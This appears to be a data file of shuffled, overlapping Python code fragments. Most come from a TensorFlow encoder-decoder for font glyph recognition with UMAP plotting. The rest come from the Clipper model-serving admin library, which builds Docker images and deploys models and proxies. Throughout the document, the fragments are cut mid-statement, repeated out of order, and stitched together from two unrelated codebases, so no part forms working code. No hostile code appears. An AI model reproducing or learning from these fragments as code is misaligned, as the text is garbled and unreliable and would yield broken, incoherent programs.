matplotlib matplotlib.use('Agg') import", "plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP')", "self.encoder(inputs) outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint", "rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu", "tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary()", "= tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if", "= './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir", "txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1)", "= tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last is None:", "label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return", "0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in test_ds: pred", "pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2, }", "predid: txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n') failed_count += 1", "True) except: # Invalid device or cannot modify virtual devices", "self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs =", "txt: correct_count = 0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as", "try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device or cannot modify", "self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last", "self.max_epoch = 300 self.steps_per_epoch = 1000 self.batch_size = 64 lr", "= self.eval_substep(inputs) result += [pred['feature']] labels += [pred['target_id']] for i", "= inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1)", "50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for", "self.save_dir self.max_epoch = 300 self.steps_per_epoch = 1000 self.batch_size = 64", "input_data = { 'image': inputs['input'], } feature = self.encoder(input_data) outputs", "inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return", "matplotlib.pyplot as plt import datetime import signal import net from", "txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result", "print('plot UMAP') for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1]))", "tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device or cannot", "Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK", "acc) @tf.function def eval_substep(self, inputs): input_data = { 'image': inputs['input'],", "cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0],", "JP'] import net class SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/'", "+ predid2 if predid == 0: txt.write('predict: id %d nothing", "%d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result)", "matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import datetime import signal", "= 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in test_ds:", "self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch =", "datetime import signal import net from matplotlib import rcParams rcParams['font.family']", "self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model)", "fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels,", "import matplotlib.pyplot as plt import datetime import signal import net", "physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device", "%d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result) labels = np.concatenate(labels)", "'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2,", "result = [] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt:", "[pred['feature']] labels += [pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target", "txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1]))", "Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans", "{ 'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1':", "with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in test_ds: pred =", "= np.concatenate(result) labels = np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result)", "= predid1 * 100 + predid2 if predid == 0:", "np import os, time, csv import tqdm import umap import", "1 pbar.update(1) acc = correct_count / (correct_count + failed_count) txt.write('==============\\n')", "i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all')", "[pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target:", "epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary() def eval(self): self.data =", "def make_plot(self, test_ds, epoch): result = [] labels = []", "-1) return { 'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id':", "predid1 * 100 + predid2 if predid == 0: txt.write('predict:", "= %f\\n'%acc) result = np.concatenate(result) labels = np.concatenate(labels) print('run UMAP')", "not last is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch)", "= tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock()", "+= 1 pbar.update(1) acc = correct_count / (correct_count + failed_count)", "%d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d", "= net.FontData() print(\"Plot: \", self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size),", "target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'],", "eval_substep(self, inputs): input_data = { 'image': inputs['input'], } feature =", "for inputs in test_ds: pred = self.eval_substep(inputs) result += [pred['feature']]", "ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i,", "matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru", "300 self.steps_per_epoch = 1000 self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3,", "self.save_dir = './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir =", "feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2':", "np.argmax(pred['pred_id2'][i]) predid = predid1 * 100 + predid2 if predid", "net from matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] =", "target_id2, } def make_plot(self, test_ds, epoch): result = [] labels", "= net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out", "self.data = net.FontData() print(\"Plot: \", self.init_epoch + 1) acc =", "checkpoint_dir = self.save_dir self.max_epoch = 300 self.steps_per_epoch = 1000 self.batch_size", "self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)), }", "import numpy as np import os, time, csv import tqdm", "* 100 + predid2 if predid == 0: txt.write('predict: id", "= %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result =", "c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1],", "{ 'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs = self.decoder(feature_out)", "predid > self.data.id_count + 1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid,", "[] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count =", "'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2, } def make_plot(self, test_ds,", "{ 'image': inputs['input'], } feature = self.encoder(input_data) outputs = self.decoder(feature)", "1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder" ]
[ "This is a convenience method to avoid the need to", "pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all model containers started via Clipper", "Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO)", "to model') runtime_dag_id = name+version+str(1) ## Starting frontend frontend_name, frontend_container_id", "if not self.connected: raise UnconnectedException() # model_info = self.get_all_models() dag_description_", "models if you specify them. You almost certainly want to", "commands. This includes the query and management frontend Docker containers", "take not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all", "via Clipper admin commands. This includes the query and management", "if not self.connected: raise UnconnectedException() def build_and_deploy_model(self, name, version, input_type,", "Finished setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups", "container_name, container_id, host)) container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id =", "tarfile import sys from cloudpickle import CloudPickler import pickle import", "with the model/proxy instances info expanded_dag = graph_parser.expand_dag(dag_description_, name, version,", "MessageToDict if sys.version_info < (3, 0): try: from cStringIO import", "model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict) #", "a model name must be a valid DNS-1123 \" \"", "self.get_all_models(verbose=True) # model_dict = {} # for m in model_info:", "version, input_type, image, labels=None, num_replicas=1, batch_size=-1): if not self.connected: raise", "model names. All replicas of all versions of each model", "version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime DAG", "Clipper: {}\".format(e.msg)) raise e def connect(self): \"\"\"Connect to a running", "with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip = self.cm.get_container_ip(host,", "pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all containers for these models", "and must start and end with \" \"an alphanumeric character", "df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents =", "frontend', query_frontend_url), # ('management frontend', mgmt_frontend_url)]: # r = requests.get(url,", "of model \"music_recommender\" and version 3 is the current version::", "Redis has crashed. It can also be called without calling", "def stop_models(self, model_names): \"\"\"Stops all versions of the specified models.", "use one of the other stop_* methods. Use with caution.", "The address as an IP address or hostname. Raises ------", "replicas for each version of each model will be stopped.", "self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip,", "containers even if the Clipper management frontend or Redis has", "__future__ import absolute_import, division, print_function import logging import docker import", "\"--setdag %s %s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG", "# if m[\"model_name\"] in model_names and not m[\"is_current_version\"]: # if", "image def deploy_model(self, name, version, input_type, image, labels=None, num_replicas=1, batch_size=-1):", ".rpc import model_pb2_grpc from .rpc import model_pb2 from .rpc import", "but will leave containers serving version 3 untouched. Parameters ----------", "= docker.from_env() self.logger.info( \"Building model Docker image with model data", "#tells the backups runtime dag info for tup in backup_info:", "models whose old containers you want to stop. Raises ------", "'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime DAG to", "self.logger.info('[DEPLOYMENT] Finished setting proxy info to model') # if(graph_parser.is_stateful(model_info)): #", "admin commands. This method can be used to clean up", "self.logger.info(\"Added new runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy", "version = str(version) _validate_versioned_model_name(name, version) run_cmd = '' if pkgs_to_install:", "#self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip))", "proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info):", "be called without calling ``connect`` first. If graceful=False, Clipper will", "will stop the currently deployed versions of models if you", "requests.get(url, timeout=5) # if r.status_code != requests.codes.ok: # raise RequestException(", "= '' if pkgs_to_install: run_as_lst = 'RUN apt-get -y install", "import RequestException import json import pprint import time import re", "self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False):", "other stop_* methods. Use with caution. \"\"\" # if not", "stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s \"%(\"localhost\",\"33333\", modelinfo)) return def", "whose old containers you want to stop. Raises ------ :py:exc:`clipper.UnconnectedException`", "3 of model \"music_recommender\" and version 3 is the current", "This method can be used to clean up leftover Clipper", "' ') run_cmd = ' '.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile(", "want to use one of the other stop_* methods. Use", "image to {}\".format(image)) for line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return", "you want to stop. Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\" # if", "reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager): self.connected = False self.cm", "frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT]", "stop_models(self, model_names): \"\"\"Stops all versions of the specified models. This", "of each model will be stopped. \"\"\" # if not", "for reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if", "df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context manager to", "input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type,", "to Clipper cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version,", "backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host,", "TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s %s", "context tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) #", "str The JSON string containing the current set of metrics", "be called without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all", "image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s \"%(\"localhost\",\"33333\",", "proxy info to model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s", "#################\") #expand the dag description with the model/proxy instances info", "# for m in model_info: # if m[\"model_name\"] in model_names", "a list of model Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas", "not self.connected: raise UnconnectedException() version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model(", "container_id, host)) container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\",", "container_info, proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag # TODO: need", ".rpc import prediction_pb2 from .rpc import management_pb2 from .rpc import", "3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any containers", "model_names and not m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict: #", "runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime dag", "as StringIO PY3 = True import grpc from .rpc import", "image, labels, num_replicas, batch_size) def build_model(self, name, version, model_data_path, base_image,", "tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try:", "container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size =", "self.logger.debug(line) return image def deploy_model(self, name, version, input_type, image, labels=None,", "hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version", "ClipperConnection(object): def __init__(self, container_manager): self.connected = False self.cm = container_manager", "at which the query frontend can be reached request predictions.", "def get_query_addr(self): \"\"\"Get the IP address at which the query", "all processes that were started via Clipper admin commands. This", "\" \"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self,", "backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3,", "container_id, host = self.cm.add_replica(model_name, model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s", "serving version 3 untouched. Parameters ---------- model_names : list(str) The", "not self.connected: # raise UnconnectedException() # model_info = self.get_all_models(verbose=True) #", "True except ClipperException as e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise", "model_pb2_grpc from .rpc import model_pb2 from .rpc import prediction_pb2_grpc from", "output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString()", "in proxy_info: proxy_name = tup[0] proxy_id = tup[1] proxy_ip =", "os import tarfile import sys from cloudpickle import CloudPickler import", "self.connected = True except ClipperException as e: self.logger.warning(\"Error starting Clipper:", "as an IP address or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions.", "Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\" # if not self.connected: # raise", "stopped. Note ---- This method will stop the currently deployed", "container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip = self.cm.get_container_ip(host, container_id)", "= \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr())", "in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image def deploy_model(self, name, version,", "from .rpc import model_pb2 from .rpc import prediction_pb2_grpc from .rpc", "used for \" \"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object):", "image, labels=None, num_replicas=1, batch_size=-1): if not self.connected: raise UnconnectedException() version", "the proxy runtime dag info for tup in proxy_info: proxy_name", "method will stop the currently deployed versions of models if", "models and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all", "stop_inactive_model_versions(self, model_names): \"\"\"Stops all model containers serving stale versions of", "def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is None: raise ClipperException( \"Invalid", "is None: raise ClipperException( \"Invalid value: {name}: a model name", "model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image,", "self.connected: raise UnconnectedException() return self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops all", "that were started via Clipper admin commands. This includes the", "backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name,", "with tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642", ".exceptions import ClipperException, UnconnectedException from .version import __version__, __registry__ from", "\"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model') runtime_dag_id", "need to explicitly list all versions of a model when", "issue Docker Kill if it's in the Docker Mode. This", "query_frontend_url), # ('management frontend', mgmt_frontend_url)]: # r = requests.get(url, timeout=5)", "absolute_import, division, print_function import logging import docker import tempfile import", "custom_context=True, tag=image) for b in build_logs: if 'stream' in b", "set of metrics for this instance. On error, the string", "pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all containers for", "= \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name, url in [('query", "UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( #", "of each model specified in the list will be stopped.", "backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host,", "to clean up leftover Clipper model containers even if the", "[] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used Internally", "raise e def connect(self): \"\"\"Connect to a running Clipper cluster.\"\"\"", "of all versions of each model specified in the list", "all Clipper model containers\") def stop_all(self, graceful=True): \"\"\"Stops all processes", "for model_info in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id, host", "stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions of the specified models.", "= self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id)", "def stop_all(self, graceful=True): \"\"\"Stops all processes that were started via", "graceful=True): \"\"\"Stops all processes that were started via Clipper admin", "stop_all_model_containers(self): \"\"\"Stops all model containers started via Clipper admin commands.", "#self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info =", "untouched. Parameters ---------- model_names : list(str) The names of the", "have deployed versions 1, 2, and 3 of model \"music_recommender\"", "will be stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for", "&& pip install'.split( ' ') run_cmd = ' '.join(run_as_lst +", "these models and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops", "containers serving versions 1 and 2 but will leave containers", "\"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\") def stop_all(self, graceful=True):", "suffix=\"tar\") as context_file: # Create build context tarfile with tarfile.TarFile(", "raise UnconnectedException() image = self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install)", "dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list =", "model_info in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id, host =", "StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo", "%s %s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for", "df_contents) # Exit Tarfile context manager to finish the tar", "\"22222\", model_image) self.logger.info(\"[Backup] Started %s with container %s:%s (HOST:%s)\"%(model_name, backup_name,", "import CloudPickler import pickle import numpy as np from google.protobuf.json_format", "base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected: raise", "run_cmd = ' '.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\")", "build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image to {}\".format(image))", "fileobj=context_file, custom_context=True, tag=image) for b in build_logs: if 'stream' in", "tar file # Seek back to beginning of file for", "{proxy_name} '.format(proxy_name=tup[-1])) return def inspect_instance(self): \"\"\"Fetches performance metrics from the", "build_logs: if 'stream' in b and b['stream'] != '\\n': #log", "info to model') runtime_dag_id = name+version+str(1) ## Starting frontend frontend_name,", "versions of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names", "``connect`` first. If graceful=False, Clipper will issue Docker Kill if", "back to beginning of file for reading context_file.seek(0) image =", "def build_model(self, name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version =", "# host=self.cm.get_admin_addr()) # for name, url in [('query frontend', query_frontend_url),", "model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b", "each model will be stopped. Note ---- This method will", "CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException, UnconnectedException from .version import", "or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each", "tempfile import requests from requests.exceptions import RequestException import json import", "in [('query frontend', query_frontend_url), # ('management frontend', mgmt_frontend_url)]: # r", "one of the other stop_* methods. Use with caution. \"\"\"", "self.logger.info( \"Successfully connected to Clipper cluster at {}\".format( self.cm.get_query_addr())) def", "= False ################################# self.logger = ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier })", "tup in proxy_info: proxy_name = tup[0] proxy_id = tup[1] proxy_ip", "StringIO PY3 = False else: from io import BytesIO as", "\"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name, container_name,", "# model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict)", "= tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents)", "%s %s %s %s\"%(proxy_ip, \"22223\", container_name, count, container_ip, \"22222\" ))", "name, version, container_info, proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag #", "if container_registry is not None: image = \"{reg}/{image}\".format( reg=container_registry, image=image)", "= [] backup_info = [] count = 1 for model_info", "return def inspect_instance(self): \"\"\"Fetches performance metrics from the running Clipper", "pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions of the", "and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified", "try: df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format(", "versions 1, 2, and 3 of model \"music_recommender\" and version", "a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names : list(str)", "Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper cluster and all", "deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if not self.connected: raise UnconnectedException()", "{}\".format(image)) for line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image def", ".rpc import management_pb2 from .rpc import management_pb2_grpc from .container_manager import", "\"\"\"Stops all model containers serving stale versions of the specified", "character (e.g. 'example.com', regex used for \" \"validation is '{reg}'\".format(name=name,", "setting model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s", "not self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp =", "# break # except RequestException as e: # self.logger.info(\"Clipper still", "version, input_type, image, labels, num_replicas, batch_size) def build_model(self, name, version,", "%s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting", "self.connected: raise UnconnectedException() def build_and_deploy_model(self, name, version, input_type, model_data_path, base_image,", "of the other stop_* methods. Use with caution. \"\"\" #", "will be stopped. \"\"\" if not self.connected: raise UnconnectedException() return", "with caution. \"\"\" # if not self.connected: # raise UnconnectedException()", "%s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name}", "if the Clipper management frontend or Redis has crashed. It", "else: from io import BytesIO as StringIO PY3 = True", "steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image to {}\".format(image)) for", "m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else:", "\"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is", "division, print_function import logging import docker import tempfile import requests", "each model will be stopped. \"\"\" # if not self.connected:", 